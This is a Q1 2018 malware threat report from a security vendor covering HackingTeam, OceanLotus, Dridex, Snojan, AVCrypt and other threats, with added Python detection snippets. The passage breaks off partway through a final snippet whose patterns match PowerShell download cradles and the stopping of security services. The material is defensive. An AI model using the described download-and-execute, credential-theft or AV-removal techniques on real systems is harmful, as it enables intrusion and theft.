BluVector Threat Report Q1 2018

Page 1

While 2018 began with the massive revelation of Meltdown and Spectre, news about any malware threats that specifically target these CPU vulnerabilities has not yet been reported or confirmed. However, the first quarter has shown that while malware prevention solutions are improving for known threats, adversaries continue to evolve their craft to create attacks that circumvent these solutions. As the financial reward for attackers increases, we expect money to remain the primary driving force throughout the year. Which leads directly into Threat Report’s new category…

BluVector Threat Report Q1 2018

Page 2

TABLE OF CONTENTS

3 Threat Report Q1 2018 Threat Chart
4 Summary

APTs Q1 2018
5 APT: HackingTeam
6 APT: OceanLotus
7 APT: PZChao
8 APT: Slingshot

TROJANS Q1 2018
9 TROJAN: AndroRAT
10 TROJAN: Dridex
11 TROJAN: GhostTeam
12 TROJAN: LockPOS
13 TROJAN: OlympicDestroyer
14 TROJAN: Snojan

MINERS Q1 2018
15 MINER: Smominru

RANSOMWARE Q1 2018
16 RANSOMWARE: AVCrypt
17 RANSOMWARE: BitPaymer/FriedEx
18 RANSOMWARE: GlobeImposter & GandCrab
19 RANSOMWARE: SamSam

NOTABLE Q4 2017 THREATS

TROJANS Q4 2017
21 TROJAN: ExpensiveWall & Hancitor
22 TROJAN: IcedID
23 TROJAN: Marcher
24 TROJAN: Orcus Rat
25 TROJAN: Scarab

RANSOMWARE Q4 2017
26 RANSOMWARE: Bad Rabbit
27 RANSOMWARE: DoubleLocker Android

Page 3

THREAT REPORT Q1 2018 THREAT CHART

[Chart: for each threat, the number of months before the threat was first publicly identified that BluVector's classifiers would have detected it; horizontal axis 10 to 50 months, grouped by category.]

BluVector runs all discovered malware samples through historical classifiers to identify when our machine learning engine would have first detected the named threat. BluVector currently supports over 35 file-specific machine learning classifiers.

APTs
HackingTeam: 21 months in advance
OceanLotus: 10 months in advance
PZChao: 19 months in advance
Slingshot: 34 months in advance

TROJANS
AndroRat: 7 months in advance
Dridex: 32 months in advance
Expensive Wall: 11 months in advance
GhostTeam: 9 months in advance
Hancitor: 35 months in advance
IcedID: 36 months in advance
LockPOS: 48 months in advance
Marcher: 11 months in advance
OlympicDestroyer: 14 months in advance
Orcus Rat: 11 months in advance
Scarab: 11 months in advance
Snojan: 14 months in advance

RANSOMWARE
AVCrypt: 5 months in advance
Bad Rabbit: 10 months in advance
BitPaymer/FriedEx: 29 months in advance
Double Locker: 10 months in advance
GandCrab: 15 months in advance
GlobeImposter: 51 months in advance
SamSam: 12 months in advance

MINERS
Smominru: 32 months in advance

© 2018 BluVector, Inc.

Page 4

SUMMARY

Mining for Malware

As predicted, Q1 2018 saw the continued rise in prominence of crypto-mining, as the topic of cryptocurrencies remains the focus of the media and the general public. Huge financial incentives and a lack of regulation continue to draw the attention of attackers. Due to the volatility in the values of differing cryptocurrencies, miners have moved away from Bitcoin toward Monero.

However, crypto-mining is far from the greatest threat facing organizations, as reflected by the fact that only one Threat Report blog in Q1 dealt with miner malware, and it was only the use of the EternalBlue exploit that made the Smominru miner noteworthy. We have added a Miner category to our Threat Report chart as we expect that there will be further miner threats in the coming year.

Ransomware Hit List

As stated in one of our Q1 Threat Report blogs, the death of ransomware in the face of the popularity of cryptominers has been greatly exaggerated. Ransomware continues to pose a significant threat to organizations, with victims facing both high monetary and reputational costs as the result of a successful attack. There were several high-profile attacks during Q1 which amply demonstrate these impacts.

The threat ransomware continues to pose is demonstrated by ransomware accounting for over 30% of Threat Report blogs in Q1. In February, SamSam ransomware infected 2,000 Colorado Department of Transport (CDOT) systems. A week later, once CDOT had 20% of systems back online, another SamSam variant reinfected those systems, resulting in the staff’s return to pen and paper. Six weeks after the initial infection, CDOT reported it had only returned to 80% of its pre-infection functionality. It stated that recovery costs may reach US$1.5 million, which includes the cost of temporarily expanding its core IT team from 25 to 150 “during the peak of the incident.” The City of Atlanta was also hit by a highly publicized SamSam ransomware attack in March, which was still not completely resolved a month later, costing $2.7 million to that point. The Baltimore 9-1-1 Computer Aided Dispatch system was also knocked offline for approximately 17 hours in late March by unnamed ransomware.

APTs and Trojans: Still Kicking

The most damaging threat comes from the two categories that allow attackers to stealthily compromise a network and extract credentials and other data: trojans and their stealthier cousins, Advanced Persistent Threats (APTs). Cumulatively, they accounted for over 63% of Threat Reports in Q1. Trojans and APTs are highly likely to be responsible for – or a large component of – successful breaches. In January 2018, the Japanese-based cryptocurrency exchange Coincheck was breached, resulting in the theft of a colossal $534 million in the relatively unknown NEM coin cryptocurrency. In March, Under Armour announced that data was compromised from 150 million accounts related to its MyFitnessPal app.

Conclusion

To put the relentlessness of attacks and the attackers perpetrating them into perspective, it has been reported that the global cybercrime economy generates an annual profit of $1.5 trillion or roughly the same as Russia’s GDP. To use an old cybersecurity adage, attackers only need to succeed once to compromise your network, defenders need to succeed every time. These facts and the events of Q1 2018 reinforce the reality that threat actors have no intention of scaling back their attacks. It is important not to be distracted by coverage given to one attack vector or class of attack – distraction has been a powerful tool in the arsenals of attackers for centuries… just think about why malware trojans are so named.

Page 5

APT: HackingTeam

What Is It?

HackingTeam is an Italian-based purveyor of spyware which became notorious for selling its main surveillance tool, Remote Control System (RCS), to nation states with a dubious record of human rights issues, as well as various intelligence and law enforcement agencies. In July 2015, HackingTeam itself was hacked, resulting in the release of over 400GB of internal data, including emails, customer lists and RCS’s source code. The hackers also gained access to the official HackingTeam Twitter account, which they used to publicly announce the hack and provide links to the data. The data revealed that HackingTeam’s employees used poor passwords including “P4ssword”.

In the wake of the data breach, HackingTeam was forced to request its customers discontinue using the RCS product, which cast doubt on the continuing viability of the company. Research done by Slovakia-based security company ESET describes samples of RCS that were created between September 2015 and October 2017 and run on Microsoft Windows. Similarities in coding style and other factors, which they have chosen not to make public, led ESET to be “fully convinced” that these new variants are from HackingTeam and not created by other actors utilizing the previously released source code.

The samples make use of VMProtect, which describes itself as “software protection against reversing and cracking.” ESET found no major advances in functionality when compared to earlier variants, which include capabilities for extracting files, intercepting emails and instant messages and covertly activating webcams and microphones. In at least two cases, they found the samples attached to emails where the filename utilized multiple file extensions in order to attempt to spoof an executable file as a PDF.

So far these new variants have been detected in 14 unnamed countries. There is no valid reason for these samples to be present on a corporate network, and their presence may indicate industrial espionage or other compromise.

How Does It Propagate?

The malware does not self-propagate. It has been observed attached to spear phishing emails as an executable file, attempting to appear as a PDF file. This again highlights the importance of user education and awareness programs as a component of overall security protections.
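The multiple-extension trick described above can be screened for at the mail gateway or in attachment logs. The following is an added example and not BluVector's or ESET's code; the extension lists are constructed for the illustration and are deliberately short, and the sample attachment names are invented rather than taken from the campaign. Only the final extension decides how Windows launches a file, so the check starts there and then looks for a document extension earlier in the name.

```python
from typing import Dict, List, Optional

# Extensions Windows will run directly. Constructed, deliberately short list for the example.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "hta", "msi"}
# Extensions a lure is likely to impersonate. Constructed for the example.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt", "jpg", "png", "zip"}


def classify_attachment_name(name: str) -> Optional[str]:
    """Return a short reason if the attachment name is an executable, stating
    which document type it impersonates when a document extension precedes
    the real one; return None for ordinary names.

    Whitespace padding such as "Report.PDF        .exe" (used to push the real
    extension out of view in a mail client) is stripped from each segment.
    """
    segments = [s.strip().lower() for s in name.strip().split(".") if s.strip()]
    if len(segments) < 2:
        return None
    final_ext = segments[-1]
    if final_ext not in EXECUTABLE_EXTS:
        return None  # ordinary document or archive; a double extension alone is fine
    for inner_ext in segments[1:-1]:
        if inner_ext in DOCUMENT_EXTS:
            return f"executable .{final_ext} masquerading as .{inner_ext}"
    return f"executable attachment .{final_ext}"


def triage_attachments(names: List[str]) -> Dict[str, str]:
    """Map each flagged attachment name to its reason; clean names are omitted."""
    flagged = {}
    for name in names:
        reason = classify_attachment_name(name)
        if reason:
            flagged[name] = reason
    return flagged


if __name__ == "__main__":
    # Constructed sample attachment names, not taken from any real campaign.
    sample = ["Quarterly_Report.pdf", "Quarterly_Report.pdf                .exe",
              "backup.tar.gz", "Invoice.doc.scr", "setup.exe"]
    for name, reason in triage_attachments(sample).items():
        print(f"{name!r}: {reason}")
```

The check reports a plain executable attachment as well as a masquerading one, because a gateway policy usually wants to quarantine both; the reason string lets the analyst see at a glance which document type the lure imitated.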

When/How Did BluVector Detect It?

Nine samples are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected all of them. Regression testing has shown all samples would have been detected by all previous MLE models. Owing to differing times the samples have been available in the wild, they would have been detected between 21 and 50 months prior to their release.

Page 6

APT: OceanLotus

What Is It?

Since 2014, the OceanLotus Advanced Persistent Threat (APT) group, also referred to as APT32 and APT-C-00, has been targeting governments and corporations in various industries located in Southeast Asia, especially Vietnam, Laos, Cambodia and the Philippines. The group is believed to be Vietnamese.

The group’s goal is to install a backdoor allowing for full access to a system and the data it contains. Recently, Slovakian-based security company ESET described the latest malware from OceanLotus. Though previously OceanLotus has utilized backdoor malware running on Macs, these samples run on Microsoft Windows.

OceanLotus utilizes two main attack vectors in order to install the backdoor. The first is the tried and true method of spear phishing emails containing malicious attachments. These attachments are executables but use icons of Microsoft Word and Excel documents in order to convince targeted users to execute them. Once executed, they display a password protected document to distract the user while the backdoor installs itself.

The second vector is the use of watering hole attacks in order to get targeted users to install fake installers or updaters for common software, such as Firefox. A watering hole attack is where threat actors compromise legitimate websites they either know or strongly suspect targeted users will visit.

Once executed, the malware creates a Windows service and deletes the document used as a distraction. The malware then drops a legitimate, digitally-signed DLL (Dynamic Link Library) file from a well-known application and uses it to load the code from a second, malicious dropped DLL file. This well-established malicious technique is known as DLL side-loading. It works by placing the malicious DLL file in the same directory as the legitimate, signed DLL and then having the legitimate DLL load the malicious DLL into memory. This appears less suspicious as the loading is performed by a signed, trusted application.
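The side-loading pattern just described leaves a recognisable trace in image-load telemetry: a signed loader picking up a DLL from its own directory rather than from a system directory. The heuristic below is an added example, not BluVector's or ESET's detection logic. The event layout, the signature flags and the small set of system DLL names are all constructed for the illustration; in a real deployment the name set would be generated from a clean host's System32 listing and the signature verdicts would come from the endpoint sensor.

```python
import json
import ntpath
from typing import Dict, List, Tuple

# Constructed image-load events (field names are this example's own, not a product schema).
SAMPLE_LOADS = "\n".join(json.dumps(e) for e in [
    {"image": r"C:\ProgramData\upd\viewer.exe", "image_signed": True,
     "module": r"C:\ProgramData\upd\version.dll", "module_signed": False},
    {"image": r"C:\Windows\System32\notepad.exe", "image_signed": True,
     "module": r"C:\Windows\System32\version.dll", "module_signed": True},
    {"image": r"C:\Program Files\App\app.exe", "image_signed": True,
     "module": r"C:\Program Files\App\helper.dll", "module_signed": True},
    {"image": r"C:\Users\u\AppData\Local\Temp\x.exe", "image_signed": True,
     "module": r"C:\Users\u\AppData\Local\Temp\msvcr100.dll", "module_signed": False},
])

# Names that normally resolve to a Microsoft-signed DLL under System32. Constructed
# placeholder set; build it from a clean host's System32 listing in practice.
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def side_load_reasons(ev: Dict[str, object]) -> List[str]:
    """Return the reasons one load event looks like side-loading (empty if none)."""
    image_dir = ntpath.dirname(str(ev["image"])).lower()
    module_dir = ntpath.dirname(str(ev["module"])).lower()
    module_name = ntpath.basename(str(ev["module"])).lower()
    reasons: List[str] = []
    # Side-loading needs the DLL beside the loader and outside the system directories.
    if module_dir != image_dir or module_dir in SYSTEM_DIRS:
        return reasons
    if module_name in SYSTEM_DLL_NAMES:
        reasons.append("system DLL name loaded from application directory")
    if ev["image_signed"] and not ev["module_signed"]:
        reasons.append("signed loader imported unsigned DLL")
    return reasons


def find_side_loads(jsonl: str) -> List[Tuple[str, List[str]]]:
    """Scan JSON-lines load events and return (module path, reasons) for each hit."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = side_load_reasons(ev)
        if reasons:
            hits.append((str(ev["module"]), reasons))
    return hits


if __name__ == "__main__":
    for module, reasons in find_side_loads(SAMPLE_LOADS):
        print(f"{module}: {'; '.join(reasons)}")
```

The fourth sample event shows the caveat: a runtime DLL shipped beside an application is normal, so the name check alone would produce noise; it is the unsigned module under a signed loader that carries the suspicion there. Combining the two signals, and tuning the name set to the environment, keeps the rule useful.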

The backdoor then encrypts its Command and Control (C2) traffic. However, if detected and captured, this traffic can be decrypted, owing to the fact the encryption key is actually part of the traffic.

How Does It Propagate?

The malware does not self-propagate. It is believed to be attached to spearphishing emails as an executable file, using the icon of a Microsoft Word or Excel document or convincing users to download and execute what they believe to be the installer or updater for common software such as Firefox. Again, this highlights the importance of user education and awareness programs as a component of overall security protections.

When/How Did BluVector Detect It?

Six samples are publicly available and BluVector’s patented Machine Learning Engine detected all of them. Regression testing has shown four samples would have been detected 41 months prior to their release, with the two remaining samples being detected 26 and 10 months prior.

Page 7

APT: PZChao

What Is It?

Recently, researchers at Bitdefender have released the results of their analysis of a sophisticated piece of custom written malware. They have named this malware PZChao, based on the domains it uses for its infrastructure. Each domain is used for a specific purpose, such as downloading or controlling malware components.

The attackers have targeted government sector, education and technology/telecommunications organizations in the U.S., Canada, Australia and throughout Asia since July 2017.

It has been observed that once compromised, three payloads are installed on an infected system. The first is a bitcoin miner. Secondly, both the 32-bit and 64-bit versions of the Mimikatz tool are installed, uploading harvested passwords to a command and control (C2) server later. Finally, a close variant of the Gh0st RAT remote access trojan (RAT) is installed. The RAT component effectively gives the attackers full control over an infected machine including keystroke logging, eavesdropping utilizing the webcam or microphone, full access to the file system and remote shell.

When analyzed, the RAT samples were found to be very similar to those used by the Iron Tiger Advanced Persistent Threat group. Believed to have been active since 2010, the group is thought to be based in China and previously considered to have initiated successful attacks on U.S. contractors, resulting in significant theft of data.

How Does It Propagate?

As is common with APTs, PZChao attacks begin with highly targeted spam emails containing a malicious Visual Basic Script (VBS) attachment, which then downloads further malicious components.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine detects PZChao components as malicious. Regression testing on various samples has shown they would have been detected by BluVector between 19 and 25 months prior to their release, with one sample detected 45 months prior.

Page 8

APT: Slingshot

What Is It?

While working on a malware incident in February 2018, controversial Russian anti-virus firm Kaspersky Labs discovered a sophisticated piece of malware, which led them to identify additional samples that are the very definition of an Advanced Persistent Threat.

The APT malware, named Slingshot based on strings found in the code, uses a unique and highly-targeted attack vector in order to compromise systems belonging to highly privileged users. An indication of the sophistication and success of this APT is that it has remained undetected in the wild for a period believed to be at least 6 years.

Kaspersky observed nearly one hundred infections in Kenya, Yemen, Libya, Afghanistan, Iraq, Tanzania, Jordan, Mauritius, Somalia, Congo, Turkey, Sudan and the United Arab Emirates, with the majority in Kenya and Yemen. Based on text found within the code, Kaspersky believes that the creators are native English speakers, though this is often difficult to ascertain. They also believe the APT’s overall sophistication points in the direction of nation state actors.

The malware is installed into routers specifically made by a Latvian company named Mikrotik. It isn’t currently known how the malware is initially placed on the router, however it could be due to an unknown (zero-day) vulnerability in the router’s firmware or potentially the use of default credentials.

When a system or network administrator responsible for administering the router logs into it, they become infected. In this way, the malware infects an attacker’s ideal user, one with access to numerous key systems and infrastructure within a corporate environment. Once installed on an administrator’s system, the APT downloads additional malware capable of taking screenshots, logging keystrokes, acquiring network data and capturing passwords, the contents of USB devices and clipboard contents. However, as the malware has full access to the kernel (also known as ring-0), which is extremely difficult to achieve without causing the dreaded “blue screen of death,” Slingshot could potentially access other sensitive data such as stored password hashes and credit card details.

As demonstrated by the amount of time this APT has gone unnoticed, the malware uses sophisticated techniques to remain undetected, including shutting down its components when it detects tools or techniques suggesting forensic or malware analysis. Similar to previous APTs, Slingshot utilizes its own custom, encrypted filesystem located in unused space on the hard drive.

How Does It Propagate?

The initial infection vector is not currently known, though it is not believed the malware self-propagates.

The malware infects the systems of administrators logging into infected Mikrotik routers.

When/How Did BluVector Detect It?

Not all samples referenced in the report are currently publicly available; however, four samples were retrieved and BluVector’s patented Machine Learning Engine detected all of them. Though the samples have only just become available after being discovered in February 2018, they are believed to have been hidden in the wild for at least 6 years, predating public release of BluVector. However, regression testing on the four samples has shown they would have been detected up to 34 months ago.

Page 9

TROJAN: AndroRAT

What Is It?

Researchers recently released analysis of a new variant of AndroRAT, a remote access trojan for Android devices.

Of note, this variant exploits the CVE-2015-1805 vulnerability in order to gain root access to the device to allow it to perform privileged actions. This vulnerability was patched by Google in March 2016; however, devices running older versions of Android, which no longer receive patches, leave a large number of users potentially exposed. This user base could include those making use of a corporate bring your own device (BYOD) program, which could provide attackers with sensitive information or other information that could be used to socially engineer an infected user or other employee.

This AndroRAT variant’s capabilities include key logging, recording audio and calls, taking photos and stealing various data, including WiFi passwords, call logs, GPS location, contacts, files, SMS messages, calendar events, screenshots and web browsing history. It can also be used to upload files to the device.

How Does It Propagate?

AndroRAT does not self-propagate.

The malware is contained in a malicious app on third party app stores, and users are enticed to download it based on its apparent usefulness. Google has confirmed this app was never present in the official Google Play store and that detection for CVE-2015-1805 was already part of their compatibility tests. This reinforces the dangers posed to users by third party app stores.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine detects this malware. Regression testing on three samples has shown the malware would have been detected by BluVector 30, 27 and 7 months prior to its release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.

Page 10

TROJAN: Dridex

What Is It?

Researchers recently discovered a malicious spam run spreading a new variant of the Dridex banking trojan. Dridex was first seen in late 2014 and continues to be very successful at stealing online banking credentials.

In an uncommon move, the links in the spam emails, which result in the downloading of malicious Microsoft Office documents, are FTP sites. It is far more common for these links to point to web pages. The FTP links in the emails contain the compromised credentials for accessing the FTP site.

The use of FTP links may be due to the attackers attempting to bypass email security products/policies. However, it highlights the importance of keeping FTP server software up-to-date and ensuring policies are in place to change all FTP passwords on a regular basis, as this limits the time-to-live for any misuse of compromised credentials.
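Links that embed FTP credentials are easy to spot once a mail filter looks for them, and the redacted form can be logged without spreading the compromised password further. The following is an added example rather than BluVector's or the researchers' tooling. The message body, the host names (reserved .test domain) and the credential are constructed; the list of document extensions treated as lures is an assumption for the illustration.

```python
import re
from typing import Dict, List
from urllib.parse import SplitResult, urlsplit

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s<>\"']+", re.IGNORECASE)
LURE_EXTS = {"doc", "docx", "docm", "xls", "xlsx", "xlsm", "rtf", "pdf"}  # constructed list

# Constructed message body modelled on the lure described above; hosts use the
# reserved .test TLD and the credential is invented.
SAMPLE_BODY = """Please review the attached invoice before Friday:
ftp://billing:Winter2018@ftp.example.test/inbox/Invoice_4471.doc
Our customer portal remains available at http://www.example.test/portal.
Public mirror: ftp://ftp.example.test/pub/readme.txt
"""


def extract_urls(text: str) -> List[str]:
    """Pull http(s)/ftp URLs out of free text, dropping trailing punctuation."""
    return [m.rstrip(".,;:)!?") for m in URL_RE.findall(text)]


def redact(parts: SplitResult) -> str:
    """Rebuild the URL with the password replaced so it can be logged or shared."""
    host = parts.hostname or ""
    if parts.port:
        host += f":{parts.port}"
    userinfo = f"{parts.username}:***@" if parts.username else ""
    return f"{parts.scheme}://{userinfo}{host}{parts.path}"


def find_credentialed_ftp_links(text: str) -> List[Dict[str, object]]:
    """Flag ftp:// links that carry a username (and usually a password) in the URL.

    Anonymous FTP links and web links are left alone; for each hit the
    password never appears in the finding, only whether one was present.
    """
    findings = []
    for url in extract_urls(text):
        parts = urlsplit(url)
        if parts.scheme.lower() != "ftp" or not parts.username:
            continue
        ext = parts.path.rsplit(".", 1)[-1].lower() if "." in parts.path else ""
        findings.append({
            "host": parts.hostname,
            "redacted": redact(parts),
            "has_password": parts.password is not None,
            "document_lure": ext in LURE_EXTS,
        })
    return findings


if __name__ == "__main__":
    for finding in find_credentialed_ftp_links(SAMPLE_BODY):
        print(finding)
```

A finding with both flags set (credential present, document path) is the combination the campaign above relied on; the host field is what an administrator of that FTP server would need in order to rotate the exposed account.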

How Does It Propagate?

The Dridex trojan does not self-propagate.

As has been the case since it was first released, Dridex relies on a malicious spam email and a malicious Microsoft Office document in order for the actual trojan to be downloaded and installed on a user’s system. Both of these steps require the user to be socially engineered into performing an action for them to be successful, e.g., clicking a link or allowing a macro to run. Dridex actors continue to use this approach as it continues to work. This again illustrates the importance of user education as a component of your overall cyber defense strategy.

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detected the Dridex trojan as malicious. Regression testing on samples has shown the Dridex trojan itself would have been detected by BluVector 32 months prior to its release and the malicious document files would have been detected 13 months prior.

Page 11

TROJAN: GhostTeam

What Is It?

A recent blog entry from Trend Micro describes malware they found in a total of 53 apps on the Google Play Store. The malware, named GhostTeam based on the presence of this string in early versions of the malware code, is primarily Adware; however, it also targets Facebook credentials, uploading them to a command and control (C2) server in the .com.vn domain.

The malware will only fully install after it confirms it is running on an actual Android device and not an emulator or a virtual machine.

The infected apps claim to be useful utility apps, such as a flashlight, device performance improvement apps and social media video downloader apps, which are particularly appealing to users in areas where mobile internet speeds are relatively low.

These apps are also illustrative of the risks associated with Adware and other potentially unwanted programs/applications. These categories can sometimes be considered essentially safe by administrators; however, as evidenced here, Adware is often more than merely annoying and can contain malicious elements or can download other malicious content.

How Does It Propagate?

The infected apps do not self-propagate.

The malware is contained in various apps on the Google Play Store and users are enticed to download them based on their apparent usefulness.

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detects the GhostTeam-infected apps as malicious. Regression testing on several infected samples has shown the files would have been detected by BluVector an average of 9 months prior to their release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.

Page 12

TROJAN: LockPOS

What Is It?

Recently, researchers have discovered a new and sophisticated variant of the LockPOS point-of-sale (POS) malware. The purpose of this malware is to extract payment card data from the memory of an infected point-of-sale system and send that data back to the attackers.

The most concerning aspect of LockPOS is that it improves upon a method that an earlier POS malware, Flokibot, used to avoid detection by endpoint anti-virus products. Aside from multiple stages of unpacking and decrypting itself, LockPOS first obtains a copy of a core Windows file (ntdll.dll) by mapping it from the system’s disk. This process ensures the malware is calling a “clean copy” of the file, therefore bypassing hooks used by anti-virus products to monitor system activity. LockPOS then injects the malicious payload into the kernel, again bypassing anti-virus products.

Researchers note that this malware required significant resources and technical skill to develop. This reflects the potential high monetary returns from a successful POS breach. POS malware is a great concern for any business, as the reputational losses and potential settlement and regulatory costs stemming from a major POS breach can have a large impact, as we have seen in several breaches including Target and Home Depot.

How Does It Propagate?

The LockPOS malware does not self-propagate.

The malware is being spread by the same botnet that previously delivered the Flokibot POS malware, which could be any device on the corporate network that has visibility into the POS devices.

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detects the LockPOS malware as malicious. Regression testing on the sample has shown the file would have been detected by BluVector 48 months prior to its release.

Page 13

TROJAN: OlympicDestroyer

What Is It?

Following the opening ceremony of the PyeongChang Winter Olympics there were reports of a cyberattack targeting systems associated with the games, including the official website. A spokesperson for PyeongChang 2018 later confirmed this. Along with the International Olympic Committee, they had decided not to name the source, though there were two obvious candidates.

Researchers at Cisco TALOS believe with “moderate confidence” that they have identified and analyzed the malware samples responsible for this attack. The malware is destructive in nature and includes components to steal credentials to allow it to spread laterally through a network. TALOS found similarities in the lateral movement and destructive parts of the code with BadRabbit and NotPetya malware.

Though the initial infection vector is currently unknown, the first piece of malware drops several other malicious files and handles propagation. Other components include a browser credential stealer, a system credential stealer (similar to Mimikatz) and a destructive component.

The destructive component deletes the shadow copies and the WBAdmin backups, clears the system and security event logs, disables all the services on the system and overwrites all writable files on all shared drives attached to the infected system.

How Does It Propagate?

The initial infection vector in this attack is currently not publicly known.

The malware uses the legitimate PSExec utility and Windows Management Instrumentation (WMI) to move laterally. This is the same mechanism employed by both BadRabbit and NotPetya malware.

The malware also includes 44 sets of hard coded credentials for systems within the Pyeongchang2018.com domain, which are also used for lateral movement. The passwords, though redacted in the TALOS article, are very poor and would have been easily guessed or brute-forced, presumably during prior reconnaissance by the attackers.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine detects the malware utilized by this attack. Regression testing on samples has shown the malware would have been detected by BluVector 14 months prior to its release.

Page 14

TROJAN: Snojan

What Is It?

As is inevitable at this time of year, there have been recent reports of large scale malicious spam campaigns based around tax-related lures. One such campaign has been reported to involve tens of millions of malicious emails, containing an attachment named taxletter.doc.

The attackers have been observed regularly altering the text of the emails in an attempt to avoid detection by spam filters and other security products. However, the email subject and body text generally claims to be advising the recipient of an issue with their tax return or informing them of an unexpected tax windfall. The object of course is to get the recipient to open the attached malicious Word document and override their default warnings to allow the embedded macro to run.

In this case, once allowed to run by the user, the macro issues a PowerShell command to download and execute a file from the bigrussiandomains[.]win site. The downloaded file, tax.exe, is then saved to the user’s Temporary directory as mixak.exe and executed.

The tax.exe malware is a password stealer, targeting, among others, passwords stored in browsers. Though convenient, storing of passwords in browsers makes it easier for attackers to obtain passwords such as banking and other financial credentials, social media credentials and credentials used for internal systems on the corporate network. These credentials can easily be monetized by attackers either using them to perform financial fraud directly or selling them. Internal credentials greatly assist attackers with reconnaissance and lateral movement within a corporate network.

Once again, these attacks rely on socially engineering users to not only open an attachment but then allow macros to run. The reason these attacks continue to use this vector is that it continues to work in sufficient numbers to make it unnecessary for less skilled attackers to invest time and effort into using more sophisticated attacks.

How Does It Propagate?

None of the malware discussed here self-propagates.

Once again these attacks utilize social engineering to be successful. Particularly at this time of year, it is important for users to be vigilant and aware of the likelihood of malicious emails using tax-related lures.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine detects this malware. Regression testing on two malicious Word document samples has shown they would have been detected by BluVector 48 months prior to their release. The password stealer malware sample would have been detected 14 months prior to its release.


MINER:Smominru

What Is It?

Recently, several articles have described how the massive increase in value of various cryptocurrencies has seen attackers switching focus from ransomware to cryptocurrency mining as it becomes the most lucrative form of malware.

The rise in miner malware is such that SANS Internet Storm Center handler Kevin Liston opined that he should add an infrared camera to his incident response toolkit, given that a computer infected with a miner would be using all available computing power and therefore be running hotter than other computers in the same office.

One such miner is Smominru, recently analyzed by Proofpoint researchers, which targets the Monero cryptocurrency. They state the attackers have already mined approximately 8,900 Monero which, due to the volatility of cryptocurrency valuations, equates to somewhere between $2.8 and $3.6 million, and they are currently mining Monero worth around $8,500 every day.

The Smominru miner spreads to vulnerable Microsoft Windows systems by utilizing the leaked NSA EternalBlue exploit (CVE-2017-0144), even though Microsoft released a patch for this in March 2017 (MS17-010).

How Does It Propagate?

As mentioned, the Smominru miner uses the EternalBlue exploit to spread. This highlights the need to have a robust patching policy and ensure that internet-facing systems have all unnecessary services turned off, in this case Windows network file sharing.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine (MLE) detects Smominru as malicious. Regression testing on samples of four different versions of Smominru has shown they would have been detected by BluVector 32, 49 and 50 months prior to their release.


RANSOMWARE:AVCrypt

What Is It?

Attribution of malicious code, that is, attempting to identify which group, individual or nation state is behind a given sample, is a controversial and often divisive issue. This is due to the fact that attribution is very difficult to prove conclusively, and it is relatively easy for a threat actor to obfuscate the true author. Sometimes the issue at hand is simply, what is the primary purpose of a piece of malware?

Such is the case with a piece of malware recently described by BleepingComputer. The malware, which they have named AVCrypt based on the file name of av2018.exe, exhibits some behaviors consistent with a potentially incomplete piece of ransomware and some related to destructive wiper malware.

The AVCrypt malware attempts to specifically uninstall and remove both Windows Defender and Malwarebytes by issuing commands to stop and delete the relevant Windows Services. There have been reports that AVCrypt queries Windows Security Center and tries to remove the registered anti-virus product. The keyword here is “tries” as AVCrypt issues a WMIC (Windows Management Instrumentation Command-line) command to attempt to uninstall the product. This is highly unlikely to be successful with the vast majority of AV products, which contain countermeasures against unauthorized removal.

Lending credence to the hypothesis that AVCrypt is a sample of in-development ransomware is the fact that when it encrypts files and creates the +HOW_TO_UNLOCK.txt file, this file only contains the string “lol n.” Additionally, the sample contains numerous uses of the Windows API call OutputDebugString. Also, when AVCrypt uses its included TOR client to send the encryption key to a hardcoded command and control server address, it appears to append invalid data to the key. The sample itself and the strings within it are not packed or obfuscated in any way, as is commonplace with most malware in the wild.

The sample also makes a number of changes to the Windows registry aimed at reducing the overall security posture of the system. Once it has completed encrypting files, it then deletes the TOR client files it dropped, clears the Windows event logs and terminates its own process. These steps are in addition to a number of Windows Services it attempts to delete at startup. Taken together, these actions could be considered quite destructive – if successful.

On balance, the above would suggest this malware is ransomware in development. However, the original BleepingComputer article has a very interesting comment added by user “hitler67”. The author of the comment, which appears not to be written by a native English speaker, states he is the author of the sample, which was intended to be used for a presentation at an unnamed security conference, and he is unaware how the sample became public. He also states he is concerned the sample and the analysis in the article could be used by “bad actors.”
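The behaviours described for the Snojan campaign above (a Word macro spawning PowerShell to download tax.exe into the Temp directory and run it as mixak.exe) and for AVCrypt (stopping and deleting security services, a WMIC product uninstall, clearing event logs) can be expressed as host-based detection rules. The following Python is an added example, not BluVector's code or anything from the cited research; the process-event format, the host names, the download host downloads.example.invalid and the service names WinDefend and MBAMService are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Simplified, constructed process-creation record (Sysmon event 1 / 4688 style)."""
    ts: str            # ISO-8601 timestamp
    host: str
    parent_image: str  # full path of the parent process
    image: str         # full path of the newly created process
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Assumed service names for Windows Defender and Malwarebytes, the two products
# AVCrypt tries to stop and delete.
SECURITY_SERVICES = {"windefend", "mbamservice"}

# PowerShell download primitives typical of macro droppers such as the Snojan campaign.
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I)
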